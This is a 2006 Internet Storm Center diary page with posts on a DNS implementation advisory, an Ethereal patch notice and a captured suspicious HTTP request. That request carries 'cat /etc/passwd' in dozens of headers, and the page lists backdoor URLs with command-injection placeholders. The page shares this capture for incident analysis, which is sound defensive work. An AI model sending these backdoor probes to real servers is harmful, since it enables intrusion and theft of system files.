Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2006-04-25 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

DNS vulnerability announced by NISCC today

Published: 2006-04-25
Last Updated: 2006-04-25 23:45:13 UTC
by donald smith (Version: 1)
0 comment(s)
NISCC has published an advisory about a potential DNS vulnerability today: http://www.niscc.gov.uk/niscc/docs/br-20060425-00311.html

These issues were discovered by use of the Oulu University Secure Programming Group's new PROTOS test-suite c09-dns. This tool is not currently public.

Their abstract (aka description) states:
"Abstract: The vulnerabilities described in this advisory affect implementations of the Domain Name System (DNS) protocol. Many vendors include support for this protocol in their products and may be impacted to varying degrees, if at all. "

Notice they state "affect implementations" which implies it is not a vulnerability in the basic DNS protocol rather it is an issue in how some of the vendors implemented that protocol.

This link has a list of vendors who have responded with vulnerability information so far. http://www.niscc.gov.uk/niscc/docs/re-20060425-00312.pdf?lang=en 

Not many vendors provided vulnerability details on their products.

The Internet Software Consortium (http://isc.org/) authors of (BIND) provided a detailed response. Juniper Networks (http://www.juniper.net/), Delegate (http://www.delegate.org/) and pdnsd (http://www.phys.uu.ne/~rombouts/ )also provided specific details. In each case the impact appears to be DOS not a remote code execution. 

Hitachi and Wind River state that they believe they are not vulnerable.

Microsoft, Sun and Ethereal all reported that they are reviewing or testing for these issues.

 

PATCHES
ISC (BIND), MyDNS, Juniper Networks, pdnsd all announced vulnerabilities.
All but ISC have released patches or upgrades for them.


ISC has not released a patch but based on their analysis their vulnerability is a very low risk. Its appears to be based on an malformed 2nd tsig packet. If you understand tsig you understand why this should not be much of a threat as they have already established a trust relationship.

The pdnsd maintainer, Paul A Rombouts,  recommends upgrading to version 1.2.4 or later of pdnsd. http://www.phys.uu.nl/~rombouts/pdnsd.html
 

MyDNS 1.1.0 has a fix for a "query-of-death" DOS and can be found here: http://mydns.bboy.net

Juniper Networks has several upgrade options for their e-series routers which are the only routers mentioned as having a vulnerability. You may need a Juniper networks account to get access to those updates. According to the vendor document above  "The issue was resolved in the following JUNOSeupdates: 5-3-5p0-2, 6-0-3p0-6, 6-0-4, 6-1-3p0-1, 7-0-1p0-7, 7-0-2, 7-1-0p0-1, 7-1-1. Later JUNOSe releases are unaffected."

Keywords:
0 comment(s)

Strange Http request...

Published: 2006-04-25
Last Updated: 2006-04-25 20:22:16 UTC
by Pedro Bueno (Version: 1)
0 comment(s)
UPDATE:

We received a nice tip about this one from Koivunen Toni, of CERT-FI...
Solution:
---> Looks like it is a scan for backdoored pr0n websites...

bellow is another sample:

http://aaaaaaaaa.com/autorank/control.php
Accept-H33p3r:<<unix-command>>
http://bbbbbbbbb.com/images/nav.php
Accept-H33p3r:<<unix-command>>
http://xxxxxxxxx.com/cgi-bin/archives/00000155_.cgi
Accept-Ip:<<unix-command>>
http://yyyyyyyyy.net/cgi-bin/system.pl
Xa=Xa;g=<<unix-command>>;exit
http://wwwwwwwww.com/cgi-bin/pennywize/penny.cgi
Accept-Ip:<<unix-command>>
http://zzzzzzzzz.com/cgi-bin/tgsw/de/teens/control.cgi
Xa=Xa;g=<<unix-command>>;exit
http://ttttttttt.com/abicons/apache/small/icon.php
Accept-H33p3r:<<unix-command>>

-----------------------------------------------------------
Today we got an interesting email...it was reporting a strange http request:

--------------------------------------------------------------------------------
POST /thumbs/index.php HTTP/1.1
Host: example.com

Connection: keep-alive
Content-Length: 0
Cookie: cat /etc/passwd
Referer: http://example.com/thumbs/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Pragma: no-cache
Cache-Control: no-cache
accept_language: cat /etc/passwd
accept_ip: cat /etc/passwd
ip: cat /etc/passwd
accept_whynot: cat /etc/passwd
accept_phpinfo: cat /etc/passwd
accept_redlight: cat /etc/passwd
accept_ASE: cat /etc/passwd
accept_X: cat /etc/passwd
USER_X87NEK: cat /etc/passwd
ACCEPT_HHT: cat /etc/passwd
Accept_MUZZ: cat /etc/passwd
Accept_MusicIsTheKey: cat /etc/passwd
Accept_encoding: cat /etc/passwd
Accept_MS: cat /etc/passwd
ACCEPT_SHREK: cat /etc/passwd
ACCEPT_s1yntr1o: cat /etc/passwd
ACCEPT_shockfx: cat /etc/passwd
ACCEPT_COOLHK: cat /etc/passwd
ACCEPT_l0ve: cat /etc/passwd
Morgoth: cat /etc/passwd
ACCEPT_ShAd0w: cat /etc/passwd
ACCEPT_bk4712: cat /etc/passwd
Accept_BBBS: cat /etc/passwd
ACCEPT_Resys: cat /etc/passwd
ACCEPT_XPW: cat /etc/passwd
BC: cat /etc/passwd
ZION: cat /etc/passwd
cmd: cat /etc/passwd
ACCEPT_netsploiter: cat /etc/passwd
ACCEPT_jayman: cat /etc/passwd
ACCEPT_Joschi: cat /etc/passwd
ACCEPT_MechW: cat /etc/passwd
ACCEPT_slickrick: cat /etc/passwd
ACCEPT_Banana: cat /etc/passwd
ACCEPT_H33p3r: cat /etc/passwd
ACCEPT_KaIzeR: cat /etc/passwd
ACCEPT_Joschi: cat /etc/passwd
Content-type: application/x-www-form-urlencoded
-----------------------------------------------------------------------

While this is a 'strange' http request, we believe that nothing on the 'cat /etc/passwd' part would be done on the webserver side...
So, our request is to know if have you ever seen this before...
---------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)


Keywords:
0 comment(s)

Time to upgrade Ethereal...

Published: 2006-04-25
Last Updated: 2006-04-25 16:43:55 UTC
by Pedro Bueno (Version: 1)
0 comment(s)

Yes, if you use Ethereal, it is time to upgrade. According an advisory posted by Frsirt, 28 vulnerabilities has been identified in Ethereal "which could be exploited by remote attackers to compromise a vulnerable system or cause a denial of service."
Ethereal released a new versin to fix those, on its version 0.99, which you can find
here.

Versions that were confirmed to be vulnerable are: Ethereal 0.8.5 through 0.10.14

You can find the signatures file 
here.

-------------------------------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)
Keywords:
0 comment(s)
Diary Archives